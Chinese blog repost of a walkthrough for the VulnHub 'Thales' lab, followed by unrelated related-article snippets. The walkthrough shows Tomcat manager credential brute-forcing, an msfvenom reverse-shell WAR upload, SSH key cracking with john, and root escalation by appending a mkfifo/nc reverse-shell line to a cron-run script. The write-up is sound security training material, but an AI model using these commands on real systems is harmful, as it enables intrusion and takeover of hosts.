当前位置: 首页 > news >正文

vulnhub靶场之Thales

news 2026/2/9 8:36:39

一.环境搭建

1.靶场描述

Description : Open your eyes and change your perspective
includes 2 flags:user.txt and root.txt.
Telegram: @machineboy141 (for any hint)
This works better with VIrtualBox rathe than VMware

2.靶场地址

https://www.vulnhub.com/entry/thales-1,749/
 

 

image-20240129163223146
 

3.启动靶场
 

Thales靶机在VMware运行会出现bug,所以我们在VirtualBox运行。
 

 

image-20240129163328402
 

虚拟机开启之后界面如上,我们不知道ip,需要自己探活,因为我们在VirtualBox运行所以网段发生了变化,网段知道:192.168.1.0/24
 

二.渗透测试
 

1.目标
 

目标就是我们搭建的靶场,靶场IP为:192.168.1.0/24
 

2.信息收集
 

(1)寻找靶场真实ip
 

nmap -sP 192.168.1.0/24
 

 

 

image-20240129163940132
 

arp-scan -l
 

 

 

image-20240129164229619
 

靶场真实ip地址为192.168.1.13
 

(2)探测端口及服务
 

nmap -p- -sV 192.168.1.13
 

 

 

image-20240129164045121
 

发现开启了22端口,OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
发现开启了8080端口,Apache Tomcat 9.0.52
 

 

(3)web指纹识别
 

whatweb -v 192.168.1.13:8080
 

 

 

image-20240129164342897
 

3.渗透测试
 

(1)访问web服务
 

http://192.168.1.13:8080
 

 

 

image-20240129164445794
 

我们可以看到是Tomcat
 

(2)扫描web服务
 

1)棱洞3.0指纹识别
 

./EHole_linux_amd64 finger -u http://192.168.1.13:8080
 

 

 

image-20240129164921542
 

2)nikto扫描网站结构
 

nikto -h http://192.168.1.13:8080
 

 

3)dirsearch目录扫描
 

dirsearch -u 192.168.1.13:8080 -e * -x 403 --random-agent
 

 

我们扫描到一个登录页面
 

http://192.168.1.13:8080/manager
 

 

 

image-20240129165606671
 

目前,我们掌握的信息是一个tomcat框架和一个登录页面,因为tomcat 有管理登录页面,于是尝试爆破
 

(3)渗透测试
 

1)msf爆破
 

search login tomcat
 

 

 

image-20240129170544353
 

show options
 

 

set RHOSTS 192.168.1.13
 

 

 

image-20240129170723929
 

爆破出来一个用户名和密码
 

 

image-20240129170810334
 

tomcat:role1
 

2)登录
 

我们可以看到登录成功
 

 

image-20240129170852364
 

3)反弹shell
 

我们可以看到/shell和上传页面,那么我们进行shell,在 web 应用程序部署界面尝试在上传 war 包反弹 shell
 

 

image-20240129171145361
 

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.9 LPORT=666666 -f war -o MS02423.war
 

 

 

image-20240129172804028
 

我们进行上传
 

 

image-20240129172724391
 

上传成功后,在应用程序列表中看到已成功部署了 war 后门,点击访问后反弹
 

 

image-20240129172826998
 

我们可以看到反弹成功
 

我们进行提权,发现需要密码,我们进行查找
 

 

image-20240129173210637
 

4)执行脚本
 

一般情况下,我们首先去home目录下查看,然后在去/var/www/html/目录下查看有没有什么线索,我们看到了thales命令,我们进行查看
 

 

image-20240130161433886
 

我们看到了两个txt文件,模式里面提示我们,一个flag在user.txt,一个在root.txt里面,那么我们进行查看user.txt文件,但是需要thales权限,我们查看notes.txt文件,notes.txt 中告诉我们有一个备用脚本在 /usr/local/bin/backup.sh
 

includes 2 flags:user.txt and root.txt.
 

 

 

image-20240130161558059
 

 

image-20240130161920839
 

我们去执行这个脚本,但是执行之后却发现没有如何变化
 

 

5)ssh 私钥文件
 

我们在thales目录下发现了隐藏的.ssh文件,我们进行查看
 

 

image-20240130162530044
 

这样看太难受了,我们进行交互模式进行查看
 

 

image-20240130162852020
 

我们可以看到公钥,我们进行查看
 

 

我们把它保存下来,用john进行爆破
 

6)john爆破
 

将私钥文件保存到攻击机,利用 ssh2john 将私钥转化为 john 能处理的 SHA 加密的文件,然后进行爆破,得到密码为 vodka06
 

 

image-20240130170943990
 

 

image-20240130171014530
 

 

image-20240130171045172
 

7)查看user.txt文件
 

我们进行登录thales用户名
 

 

image-20240130171432515
 

我们获取到第一个flag,还有一个flag在root.txt里面,我们进行提权
 

8)提权
 

之前我们看到的那个脚本还没有查看内容,现在我们查看一下那个备份文件的代码
 

 

image-20240130171752726
 

是一个shell文件,并且是能运行命令的,我们是可以编辑的,并且是root用户运行的,我们插入一串反弹shell的命令
 

 

image-20240130171844539
 

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.9 5555 >/tmp/f" >> backup.sh
 

 

 

image-20240130172619811
 

等一会可以看到反弹成功,我们查看flag即可
 

 

image-20240130172935974
 

三.相关资源
 

1.靶场下载地址
 

2.nmap
 

3.arp-scan
 

4.masscan
 

5.[ 常用工具篇 ] 渗透神器 whatweb 安装使用详解
 

6.[ 渗透工具篇 ] EHole(棱洞)3.0安装部署及详解(linux & win)
 

7.nikto工具的使用
 

8.dirsearch目录扫描
 

9.msf工具使用
 

10.ssh私钥文件
 

11.john爆破密码
 

12.反弹shell














相关文章:
















vulnhub靶场之Thales




一.环境搭建 
1.靶场描述 
Description : Open your eyes and change your perspective
includes 2 flags:user.txt and root.txt.
Telegram: machineboy141 (for any hint)
This works better with VIrtualBox rathe than VMware 2.靶场地址 
https://www.vulnhub.com/entry/t…...






编程日记
2024/2/5 1:51:53



















Qt之使用Qt内置图标




一效果 二.原理 
Qt内置图标封装在QStyle中,共七十多个图标,可以直接拿来用,能应付不少简单程序需求,不用自己去找图标并添加到资源文件了。 下面是内置图标的枚举定义:     
enum StandardPixmap {SP_TitleBarMenuButton,SP_TitleBarMinButton,SP_TitleBarMaxButton,SP_T…...






编程日记
2024/2/5 1:49:51



















《计算机网络简易速速上手小册》第10章:未来网络技术趋势(2024 最新版)




文章目录 10.1 边缘计算与网络设计 - 未来网络的速度与激情10.1.1 基础知识10.1.2 重点案例:使用 Python 实现边缘计算的实时视频分析准备工作Python 脚本示例 10.1.3 拓展案例1:智能交通系统Python 脚本示例 - 边缘计算设备上的交通流量分析 10.1.4 拓展…...






编程日记
2024/2/5 1:48:50



















Vue引入Axios




1.命令安装axios和vue-axios npm install axios --save
npm install vue-axios --save 2.package.json查看版本 3.在main.js中引用 import axios from axios;
import VueAxios from vue-axios;
Vue.use(VueAxios,axios) 4.如何使用 (初始化方法) 将下列代…...






编程日记
2024/2/5 1:46:48



















【git 本地管理版本及与github合并】 Init Push Pull操作解决方案




文章目录 创建本地仓库,并与远程仓库链接更新本地仓库并使用Push推送到远程仓库 1. 几种基础命令介绍:2. git push操作流程   .gitignore删除本地仓库,断开本地与远程的链接设置用于提交commit的用户名,邮箱,以便githu…...






编程日记
2024/2/5 1:43:45



















JavaSE-项目小结-IP归属地查询(本地IP地址库)




一、项目介绍 1. 背景 IP地址是网络通信中的重要标识,通过分析IP地址的归属地信息,可以帮助我们了解访问来源、用户行为和网络安全等关键信息。例如应用于网站访问日志分析:通过分析访问日志中的IP地址,了解网站访问者的地理位置分…...






编程日记
2024/2/5 1:37:38



















使用最大边界相关算法处理文章自动摘要




一、需求背景 对于博客或者文章来说,摘要是普遍性的需求。但是我们不可能让作者自己手动填写摘要或者直接暴力截取文章的部分段落作为摘要,这样既不符合逻辑又不具有代表性,那么,是否有相关的算法或者数学理论能够完成这个需求呢&…...






编程日记
2024/2/5 1:32:32



















ref和reactive, toRefs的使用




看尤雨溪说:为什么Vue3 中应该使用 Ref 而不是 Reactive? toRefs 
import { ref, toRefs } from vue;// 定义一个响应式对象
const state  ref({count: 0,name: Vue
});// 使用toRefs转换为响应式引用对象
const reactiveState  toRefs(state);// 现在你…...






编程日记
2024/2/5 1:30:30



















从源代码看Chrome 版本号




一直以来都是用Chrome 浏览器,但是看到Chrome 点分4 组数据的表达方式,总是感觉怪怪的,遂深入源代码了解她的版本号具体表示的内容 
chrome 浏览器中显示的版本号 源代码中的版本号标识 
版本号文件位于 chrome/VERSION , 看到源代…...






编程日记
2024/2/5 1:26:27



















Vue 图片加载失败处理




Vue 图片加载失败处理 
很多人会使用 error 方法在图片加载 失败时替换img.src 的方式 
但是这种方式在默认图片加载失败时,error会出现死循环,所以我使用了error  v-if的方式。 
<template><div><!-- 正常时显示 --><img v-if&quo…...






编程日记
2024/2/5 1:25:26



















Quartus IP学习之ISSP(In-System Sources  Probes)




一、ISSP IP概要&#xff1a; 
ISSP&#xff1a;In-System Sources & Probes Intel FPGA IP 
作用&#xff1a; 
分为In-System Sources与In-System Probesn-System Sources&#xff0c;输入端&#xff0c;等价于拨码开关&#xff0c;通过输入板载FPGA上的拨码开关状态改变…...






编程日记
2024/2/5 1:20:19



















Vue组件通信讲解[父子组件通信]




Vue组件通信讲解 
在Vue中&#xff0c;父子组件之间的通信可以通过props和emit来实现。props用于从父组件向子组件传递数据&#xff0c;而$emit用于从子组件向父组件触发事件。 
以下是一个包含子传父和父传子通信的Vue案例解决方案&#xff1a; 
父组件&#xff1a;Parent.vue…...






编程日记
2024/2/5 1:18:17



















Qt应用开发(安卓篇)——调用ioctl、socket等C函数




一、前言 在 Qt for Android 中没办法像在嵌入式linux中一样直接使用 ioctl 等底层函数&#xff0c;这是因为因为 Android 平台的安全性和权限限制。 在 Android 中&#xff0c;访问设备硬件和系统资源需要特定的权限&#xff0c;并且需要通过 Android 系统提供的 API 来进行。…...






编程日记
2024/2/5 1:17:16



















centos 安装docker CE




centos 安装docker CE 
0. 参考 
1. 安装需要的包 
sudo yum install -y yum-utils \device-mapper-persistent-data \lvm22. 添加仓库 
sudo yum-config-manager \--add-repo \https://download.docker.com/linux/centos/docker-ce.repo3. 安装docker 
sudo yum install docke…...






编程日记
2024/2/5 1:12:11



















某赛通电子文档安全管理系统 UploadFileList 任意文件读取漏洞复现




0x01 产品简介 
某赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能…...






编程日记
2024/2/5 1:11:09



















Kafka运维相关知识




目录 
一、基本概念 
二、技术特性 
三、设计思想 
四、运维建议 一、基本概念 Apache kafka 是一个分布式的基于push-subscribe的消息系统&#xff0c;它具备快速、可扩展、可持久化的特点。它的最大的特性就是可以实时的处理大量数据以满足各种需求场景&#xff1a;比如基于h…...






编程日记
2024/2/5 1:06:05



















鸿蒙Native项目生产动态库(.so) 和静态库(.a)




通过 DevEco Studio 创建Native项目&#xff0c;我的版本为&#xff1a;Build Version: 3.1.0.501, built on June 20, 2023 
CMakeLists.txt 文件中默认生成的是动态库&#xff0c;该命令为&#xff1a;add_library(entry SHARED hello.cpp) 
通过Sutdio的操作 Build -> Bu…...






编程日记
2024/2/5 1:05:04



















B站课程评分




Spring6 
https://www.bilibili.com/video/BV1Ft4y1g7Fb/  评价: 推荐一看 配套文档优秀, 老师口齿清晰, 条理不错. 
mybatis 
https://www.bilibili.com/video/BV1JP4y1Z73S/?spm_id_from333.337.search-card.all.click  评价: 推荐一看 配套文档优秀, 老师口齿清晰, 条理不错…...






编程日记
2024/2/5 1:04:03



















【C++】拷贝构造函数和赋值运算符重载详解




目录 拷贝构造函数 
概念 
特征 
赋值运算符重载 
运算符重载 
赋值运算符重载 
​编辑前置和后置重载 ⭐拷贝构造函数 
⭐概念 
拷贝构造函数&#xff1a;只有单个形参&#xff0c;该形参是对本类类型对象的引用(一般常用const修饰)&#xff0c;在用已存 在的类类型对象创建新…...






编程日记
2024/2/5 1:02:00



















BUUCTF-Real-[ThinkPHP]5-Rce




1、ThinkPHP检测工具 
https://github.com/anx0ing/thinkphp_scan 漏洞检测 通过漏洞检测&#xff0c;我们发现存在rce漏洞&#xff01; 
2、漏洞利用 
----
[!] Name: Thinkphp5 5.0.22/5.1.29 Remote Code Execution VulnerabilityScript: thinkphp5022_5129.pyUrl: http://n…...






编程日记
2024/2/5 0:59:58





















【杂谈】-递归进化:人工智能的自我改进与监管挑战




递归进化&#xff1a;人工智能的自我改进与监管挑战 文章目录 递归进化&#xff1a;人工智能的自我改进与监管挑战1、自我改进型人工智能的崛起2、人工智能如何挑战人类监管&#xff1f;3、确保人工智能受控的策略4、人类在人工智能发展中的角色5、平衡自主性与控制力6、总结与…...






编程新知
2025/12/9 0:22:01



















反向工程与模型迁移:打造未来商品详情API的可持续创新体系




在电商行业蓬勃发展的当下&#xff0c;商品详情API作为连接电商平台与开发者、商家及用户的关键纽带&#xff0c;其重要性日益凸显。传统商品详情API主要聚焦于商品基本信息&#xff08;如名称、价格、库存等&#xff09;的获取与展示&#xff0c;已难以满足市场对个性化、智能…...






编程新知
2025/9/15 5:56:53



















屋顶变身“发电站” ,中天合创屋面分布式光伏发电项目顺利并网!




5月28日&#xff0c;中天合创屋面分布式光伏发电项目顺利并网发电&#xff0c;该项目位于内蒙古自治区鄂尔多斯市乌审旗&#xff0c;项目利用中天合创聚乙烯、聚丙烯仓库屋面作为场地建设光伏电站&#xff0c;总装机容量为9.96MWp。 
项目投运后&#xff0c;每年可节约标煤3670…...






编程新知
2026/1/30 2:45:51



















免费PDF转图片工具




免费PDF转图片工具 
一款简单易用的PDF转图片工具&#xff0c;可以将PDF文件快速转换为高质量PNG图片。无需安装复杂的软件&#xff0c;也不需要在线上传文件&#xff0c;保护您的隐私。 
工具截图 主要特点 
&#x1f680; 快速转换&#xff1a;本地转换&#xff0c;无需等待上…...






编程新知
2026/1/26 9:07:56



















【Nginx】使用 Nginx+Lua 实现基于 IP 的访问频率限制




使用 NginxLua 实现基于 IP 的访问频率限制 
在高并发场景下&#xff0c;限制某个 IP 的访问频率是非常重要的&#xff0c;可以有效防止恶意攻击或错误配置导致的服务宕机。以下是一个详细的实现方案&#xff0c;使用 Nginx 和 Lua 脚本结合 Redis 来实现基于 IP 的访问频率限制…...






编程新知
2025/10/22 6:06:44



















什么是VR全景技术




VR全景技术&#xff0c;全称为虚拟现实全景技术&#xff0c;是通过计算机图像模拟生成三维空间中的虚拟世界&#xff0c;使用户能够在该虚拟世界中进行全方位、无死角的观察和交互的技术。VR全景技术模拟人在真实空间中的视觉体验&#xff0c;结合图文、3D、音视频等多媒体元素…...






编程新知
2026/2/5 19:40:10



















【SpringBoot自动化部署】




SpringBoot自动化部署方法 
使用Jenkins进行持续集成与部署 
Jenkins是最常用的自动化部署工具之一&#xff0c;能够实现代码拉取、构建、测试和部署的全流程自动化。 
配置Jenkins任务时&#xff0c;需要添加Git仓库地址和凭证&#xff0c;设置构建触发器&#xff08;如GitHub…...






编程新知
2025/11/18 2:17:20



















es6+和css3新增的特性有哪些




一&#xff1a;ECMAScript 新特性&#xff08;ES6&#xff09; 
ES6 (2015) - 革命性更新 
1&#xff0c;记住的方法&#xff0c;从一个方法里面用到了哪些技术 
1&#xff0c;let /const块级作用域声明2&#xff0c;**默认参数**&#xff1a;函数参数可以设置默认值。3&#x…...






编程新知
2025/11/26 7:13:37



















论文阅读:Matting by Generation




今天介绍一篇关于 matting 抠图的文章&#xff0c;抠图也算是计算机视觉里面非常经典的一个任务了。从早期的经典算法到如今的深度学习算法&#xff0c;已经有很多的工作和这个任务相关。这两年 diffusion 模型很火&#xff0c;大家又开始用 diffusion 模型做各种 CV 任务了&am…...






编程新知
2026/1/27 19:36:39



















开疆智能Ethernet/IP转Modbus网关连接鸣志步进电机驱动器配置案例




在工业自动化控制系统中&#xff0c;常常会遇到不同品牌和通信协议的设备需要协同工作的情况。本案例中&#xff0c;客户现场采用了 罗克韦尔PLC&#xff0c;但需要控制的变频器仅支持 ModbusRTU 协议。为了实现PLC 对变频器的有效控制与监控&#xff0c;引入了开疆智能Etherne…...






编程新知
2026/1/24 11:52:04